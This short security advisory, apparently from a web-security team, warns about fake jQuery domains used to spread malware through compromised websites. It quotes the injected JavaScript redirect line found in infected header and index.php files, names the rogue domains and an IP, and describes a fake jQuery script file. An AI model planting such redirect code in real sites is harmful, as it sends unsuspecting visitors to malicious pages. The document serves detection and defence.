We keep seeing fake jQuery sites popping up and being used to distributemalware. One was jquerys.org, other was jquery-framework.com and the new oneis jqueryc.com (199.59.241.179).
And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files:
window.top.location.href = "httx://www.jqueryc.com"Which redirects any visitor to the web site to jqueryc.com where it is then sent to other random spammy domains (seems like a TDS is in place).
Update:We are also seeing some sites with this javascript file being included: http://www.jqueryc.com/jquery-1.6.3.min.js, which just redirects back to jqueryc.com via the same window.top.location.href in javascript.
*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.
**The official jquery sites are jquery.org or jquery.com. Other variations are likely fake.
Luke Leal
John Castro
Krasimir Konov
Mohit Jawanjal
Denis Sinegubko